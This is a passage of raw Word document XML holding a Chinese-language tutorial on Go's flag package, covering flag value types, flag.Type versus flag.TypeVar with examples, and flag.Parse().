          </w:tcPr>
          <w:p w14:paraId="43FBAAB0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
                <w:color w:val="444444"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="444444"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>bool 类型 flag</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60" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="28CFE7C6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
                <w:color w:val="444444"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="444444"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>1、0、t、f、T、F、true、false、TRUE、FALSE、True、False</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C452C" w14:paraId="3B0D4DA4" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="270BB651" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
                <w:color w:val="444444"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="444444"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>时间段 flag</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60" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="075DF85A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
                <w:color w:val="444444"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="444444"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>任何合法的时间段字符串，如“300ms”、“-1.5h”、“2h45m”，</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="444444"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:br/>
              <w:t>合法的单位有“ns”、“us”、“µs”、“ms”、“s”、“m”、“h”</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="08686838" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解析参数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2872E571" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>两种定义命令行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>flag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参数的方法。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD8E343" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>flag.Type</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会返回值给一个变量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D93588E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>flag.TypeVar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是一个动作，给变量的指针复制。函数本身没有返回值。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B929E9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62899FD1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上面的方法绑定参数后，使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>flag.Parse()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进行解析</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C4FC67" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1) flag.Type()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：实际没</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>TypeVar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>常用，因为该函数返回指针类型</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2413CF57" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>基本格式如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="270600DE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">flag.Type(flag </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>名</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>默认值</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>帮助信息</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>) *Type</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5C0A55" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="620535DE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Type </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Int</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Bool </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等，返回值为一个相应类型的指针，例如我们要定义姓名、年龄、婚否三个命令行参数，我们可以按如下方式定义：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF0816D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>name := flag.String("name", "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>张三</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>", "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>姓名</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A23580" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>age := flag.Int("age", 18, "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>年龄</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36EB2F91" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>married := flag.Bool("married", false, "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>婚否</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="778C8CC3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>delay := flag.Duration("d", 0, "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>时间间隔</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="660112CB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>需要注意的是，此时</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>age</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>married</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">delay </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>均为对应类型的指针。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523ADC9F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2) flag.TypeVar()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：实际常用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="372EA8AA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>基本格式如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="140940A0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">flag.TypeVar(Type </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>指针</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">, flag </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>名</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>默认值</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>帮助信息</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4200FCD0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AEF845D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">TypeVar </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> IntVar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>StringVar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">BoolVar </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等，其功能为将</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> flag </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>绑定到一个变量上，例如我们要定义姓名、年龄、婚否三个命令行参数，我们可以按如下方式定义：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B5C498" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>var name string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0543C8C6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>var age int</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="147A0755" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>var married bool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28781296" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>var delay time.Duration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="216DBBA4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>flag.StringVar(&amp;name, "name", "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>张三</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>", "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>姓名</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C4506F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>flag.IntVar(&amp;age, "age", 18, "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>年龄</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4E5B3C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>flag.BoolVar(&amp;married, "married", false, "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>婚否</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="180EED62" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>flag.DurationVar(&amp;delay, "d", 0, "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>时间间隔</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB58140" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>flag.Parse()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="412C3404" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过以上两种方法定义好命令行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> flag </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参数后，需要通过调用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> flag.Parse() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来对命令行参数进行解析。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D44708" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05B5E5FC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>支持的命令行参数格式有以下几种：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E44B37D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-flag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：只支持</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> bool </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类型；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA68C11" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-flag=x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
